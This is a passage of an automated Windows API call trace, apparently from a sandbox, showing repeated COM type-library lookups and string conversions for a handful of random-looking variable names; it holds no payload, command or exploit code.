ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x43006f00000000, pDummy=0x0) returned 0x0 [0069.604] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81222 | out: _Dst=0x144ec0) returned 0x0 [0069.604] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zXwAwA", lHashVal=0x10e3eb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8129a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zXwAwA") returned 7 [0069.605] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zXwAwA", lHashVal=0x10e3eb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8129a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zXwAwA") returned 7 [0069.605] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zXwAwA", lHashVal=0x10e3eb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.605] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zXwAwA") returned 0x10e3eb [0069.605] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zXwAwA" | out: _Dst="zXwAwA") returned 0x0 [0069.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zXwAwA") returned 7 [0069.605] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.605] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zXwAwA", lHashVal=0x10e3eb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.605] IUnknown:Release (This=0x665ba50) returned 0xd [0069.605] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.605] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zXwAwA", lHashVal=0x10e3eb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.605] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.605] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.605] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zXwAwA", lHashVal=0x10e3eb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.605] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.605] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.605] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zXwAwA", lHashVal=0x10e3eb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.605] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8129a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zXwAwA") returned 7 [0069.605] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zXwAwA", lHashVal=0x10e3eb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.605] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.605] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8129a | out: _Dst=0x67c2d40) returned 0x0 [0069.606] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zXwAwA") returned 0x105e55 [0069.606] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zXwAwA" | out: _Dst="_B_var_zXwAwA") returned 0x0 [0069.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zXwAwA") returned 14 [0069.606] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.606] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zXwAwA", lHashVal=0x105e55, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.606] IUnknown:Release (This=0x665ba50) returned 0xd [0069.606] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.606] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zXwAwA", lHashVal=0x105e55, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.606] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.606] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.606] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zXwAwA", lHashVal=0x105e55, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.606] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.606] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.606] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zXwAwA", lHashVal=0x105e55, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.606] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.606] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.606] IUnknown:Release (This=0x665ba50) returned 0xd [0069.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87043e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zXwAwA") returned 14 [0069.606] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zXwAwA", lHashVal=0x105e55, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0069.606] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8129a | out: _Dst=0x144ec0) returned 0x0 [0069.606] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lXcA1AQ", lHashVal=0x101180, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lXcA1AQ") returned 8 [0069.607] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lXcA1AQ", lHashVal=0x101180, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lXcA1AQ") returned 8 [0069.607] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lXcA1AQ", lHashVal=0x101180, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.607] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lXcA1AQ") returned 0x101180 [0069.607] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lXcA1AQ" | out: _Dst="lXcA1AQ") returned 0x0 [0069.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lXcA1AQ") returned 8 [0069.607] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.607] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lXcA1AQ", lHashVal=0x101180, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.607] IUnknown:Release (This=0x665ba50) returned 0xd [0069.607] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.607] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lXcA1AQ", lHashVal=0x101180, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.607] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.607] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.607] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lXcA1AQ", lHashVal=0x101180, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.607] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.607] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.607] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lXcA1AQ", lHashVal=0x101180, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.607] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lXcA1AQ") returned 8 [0069.607] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lXcA1AQ", lHashVal=0x101180, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.607] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.607] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b812c2 | out: _Dst=0x67c2d40) returned 0x0 [0069.607] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lXcA1AQ") returned 0x100583 [0069.608] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lXcA1AQ" | out: _Dst="_B_var_lXcA1AQ") returned 0x0 [0069.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lXcA1AQ") returned 15 [0069.608] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.608] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lXcA1AQ", lHashVal=0x100583, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.608] IUnknown:Release (This=0x665ba50) returned 0xd [0069.608] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.608] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lXcA1AQ", lHashVal=0x100583, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.608] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.608] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.608] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lXcA1AQ", lHashVal=0x100583, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.608] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.608] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.608] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lXcA1AQ", lHashVal=0x100583, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.608] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.608] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.608] IUnknown:Release (This=0x665ba50) returned 0xd [0069.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87046e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lXcA1AQ") returned 15 [0069.608] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lXcA1AQ", lHashVal=0x100583, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.608] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b812c2 | out: _Dst=0x144ec0) returned 0x0 [0069.608] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zDU_wQ", lHashVal=0x10583d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zDU_wQ") returned 7 [0069.608] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zDU_wQ", lHashVal=0x10583d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zDU_wQ") returned 7 [0069.609] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zDU_wQ", lHashVal=0x10583d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.609] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zDU_wQ") returned 0x10583d [0069.609] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zDU_wQ" | out: _Dst="zDU_wQ") returned 0x0 [0069.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zDU_wQ") returned 7 [0069.609] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.609] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zDU_wQ", lHashVal=0x10583d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.609] IUnknown:Release (This=0x665ba50) returned 0xd [0069.609] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.609] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zDU_wQ", lHashVal=0x10583d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.609] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.609] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.609] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zDU_wQ", lHashVal=0x10583d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.609] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.609] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.609] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zDU_wQ", lHashVal=0x10583d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.609] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b812ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zDU_wQ") returned 7 [0069.609] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zDU_wQ", lHashVal=0x10583d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.609] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.609] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b812ea | out: _Dst=0x67c2d40) returned 0x0 [0069.609] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zDU_wQ") returned 0x10d2e6 [0069.609] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zDU_wQ" | out: _Dst="_B_var_zDU_wQ") returned 0x0 [0069.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zDU_wQ") returned 14 [0069.610] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.610] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zDU_wQ", lHashVal=0x10d2e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.610] IUnknown:Release (This=0x665ba50) returned 0xd [0069.610] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.610] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zDU_wQ", lHashVal=0x10d2e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.610] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.610] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.610] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zDU_wQ", lHashVal=0x10d2e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.610] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.610] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.610] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zDU_wQ", lHashVal=0x10d2e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.610] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.610] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.610] IUnknown:Release (This=0x665ba50) returned 0xd [0069.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87049e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zDU_wQ") returned 14 [0069.610] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zDU_wQ", lHashVal=0x10d2e6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x77005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x77005f00000000, pDummy=0x0) returned 0x0 [0069.610] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b812ea | out: _Dst=0x144ec0) returned 0x0 [0069.610] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RAC4Qwc", lHashVal=0x102a61, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81312, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAC4Qwc") returned 8 [0069.610] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RAC4Qwc", lHashVal=0x102a61, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81312, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAC4Qwc") returned 8 [0069.611] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RAC4Qwc", lHashVal=0x102a61, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.611] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAC4Qwc") returned 0x102a61 [0069.611] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="RAC4Qwc" | out: _Dst="RAC4Qwc") returned 0x0 [0069.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="RAC4Qwc") returned 8 [0069.611] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.611] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RAC4Qwc", lHashVal=0x102a61, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.611] IUnknown:Release (This=0x665ba50) returned 0xd [0069.611] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.611] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RAC4Qwc", lHashVal=0x102a61, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.611] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.611] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.611] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RAC4Qwc", lHashVal=0x102a61, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.611] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.611] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.611] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RAC4Qwc", lHashVal=0x102a61, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.611] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81312, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAC4Qwc") returned 8 [0069.611] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RAC4Qwc", lHashVal=0x102a61, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.611] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.611] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81312 | out: _Dst=0x67c2d40) returned 0x0 [0069.611] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RAC4Qwc") returned 0x101e64 [0069.611] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_RAC4Qwc" | out: _Dst="_B_var_RAC4Qwc") returned 0x0 [0069.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_RAC4Qwc") returned 15 [0069.611] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.611] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RAC4Qwc", lHashVal=0x101e64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.611] IUnknown:Release (This=0x665ba50) returned 0xd [0069.611] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.612] ITypeLib:RemoteIsName (in: 